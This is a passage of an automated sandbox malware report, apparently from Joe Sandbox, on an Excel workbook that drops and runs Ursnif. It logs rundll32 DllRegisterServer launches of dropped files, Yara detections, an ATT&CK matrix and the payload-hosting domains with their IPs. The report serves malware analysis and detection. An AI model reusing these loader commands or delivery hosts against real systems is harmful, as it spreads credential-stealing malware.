        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: FED8GODpaD.xlsbInitial sample: OLE zip file path = xl/media/image1.png
        Source: FED8GODpaD.xlsbInitial sample: OLE zip file path = xl/media/image2.png
        Source: FED8GODpaD.xlsbInitial sample: OLE zip file path = xl/media/image3.png
        Source: FED8GODpaD.xlsbInitial sample: OLE zip file path = xl/media/image4.png
        Source: FED8GODpaD.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: FED8GODpaD.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
        Source: FED8GODpaD.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.304391933.00000000034D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.34d0000.2.raw.unpack, type: UNPACKEDPE
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: rundll32.exe, 00000002.00000002.235686575.0000000000C90000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.317076340.0000000000DE0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.304692405.0000000004720000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: rundll32.exe, 00000002.00000002.235686575.0000000000C90000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.317076340.0000000000DE0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.304692405.0000000004720000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: rundll32.exe, 00000002.00000002.235686575.0000000000C90000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.317076340.0000000000DE0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.304692405.0000000004720000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: rundll32.exe, 00000002.00000002.235686575.0000000000C90000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.317076340.0000000000DE0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.304692405.0000000004720000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: Yara matchFile source: app.xml, type: SAMPLE

        Stealing of Sensitive Information:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.304391933.00000000034D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.34d0000.2.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.304391933.00000000034D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.34d0000.2.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting3Path InterceptionProcess Injection1Masquerading121OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting3LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\fikftkm.thj1100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gif100%Joe Sandbox ML

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        thefamouscurrybazaar.co.uk4%VirustotalBrowse
        ponchokhana.com5%VirustotalBrowse
        ethereality.info2%VirustotalBrowse
        springbedspetroleum.com2%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://dataservice.o365filtering.com0%URL Reputationsafe
        https://dataservice.o365filtering.com0%URL Reputationsafe
        https://dataservice.o365filtering.com0%URL Reputationsafe
        https://api.cortana.ai0%URL Reputationsafe
        https://api.cortana.ai0%URL Reputationsafe
        https://api.cortana.ai0%URL Reputationsafe
        https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
        https://directory.services.0%URL Reputationsafe
        https://directory.services.0%URL Reputationsafe
        https://directory.services.0%URL Reputationsafe
        https://staging.cortana.ai0%URL Reputationsafe
        https://staging.cortana.ai0%URL Reputationsafe
        https://staging.cortana.ai0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        thefamouscurrybazaar.co.uk
        5.100.152.162
        truefalseunknown
        ponchokhana.com
        5.100.155.169
        truefalseunknown
        ethereality.info
        108.167.180.111
        truefalseunknown
        springbedspetroleum.com
        50.116.95.68
        truefalseunknown
        devrongolf.com
        43.229.135.209
        truefalse
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
            high
            https://login.microsoftonline.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
              high
              https://shell.suite.office.com:14434103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                  high
                  https://autodiscover-s.outlook.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                    high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                      high
                      https://cdn.entity.4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://api.addins.omex.office.net/appinfo/query4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                        high
                        https://clients.config.office.net/user/v1.0/tenantassociationkey4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                          high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                            high
                            https://powerlift.acompli.net4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://lookup.onenote.com/lookup/geolocation/v14103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                              high
                              https://cortana.ai4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                high
                                https://cloudfiles.onenote.com/upload.aspx4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                  high
                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                    high
                                    https://entitlement.diagnosticssdf.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                      high
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                        high
                                        https://api.aadrm.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://ofcrecsvcapi-int.azurewebsites.net/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                          high
                                          https://api.microsoftstream.com/api/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                            high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                              high
                                              https://cr.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                high
                                                https://portal.office.com/account/?ref=ClientMeControl4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                  high
                                                  https://ecs.office.com/config/v2/Office4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                    high
                                                    https://graph.ppe.windows.net4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                      high
                                                      https://res.getmicrosoftkey.com/api/redemptionevents4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://powerlift-frontdesk.acompli.net4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://tasks.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                        high
                                                        https://officeci.azurewebsites.net/api/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://sr.outlook.office.net/ws/speech/recognize/assistant/work4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                          high
                                                          https://store.office.cn/addinstemplate4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                            high
                                                            https://globaldisco.crm.dynamics.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                              high
                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                high
                                                                https://store.officeppe.com/addinstemplate4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://dev0-api.acompli.net/autodetect4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.odwebp.svc.ms4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://api.powerbi.com/v1.0/myorg/groups4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                  high
                                                                  https://web.microsoftstream.com/video/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                    high
                                                                    https://graph.windows.net4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                      high
                                                                      https://dataservice.o365filtering.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://officesetup.getmicrosoftkey.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://analysis.windows.net/powerbi/api4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                        high
                                                                        https://prod-global-autodetect.acompli.net/autodetect4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://outlook.office365.com/autodiscover/autodiscover.json4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                          high
                                                                          https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                            high
                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                              high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                high
                                                                                https://ncus.contentsync.4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                  high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                    high
                                                                                    http://weather.service.msn.com/data.aspx4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                      high
                                                                                      https://apis.live.net/v5.0/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                        high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                          high
                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                            high
                                                                                            https://management.azure.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                              high
                                                                                              https://wus2.contentsync.4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://incidents.diagnostics.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/user/v1.0/ios4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                  high
                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                    high
                                                                                                    https://o365auditrealtimeingestion.manage.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                        high
                                                                                                        https://api.office.net4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnosticssdf.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                            high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policies4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                              high
                                                                                                              https://entitlement.diagnostics.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                  high
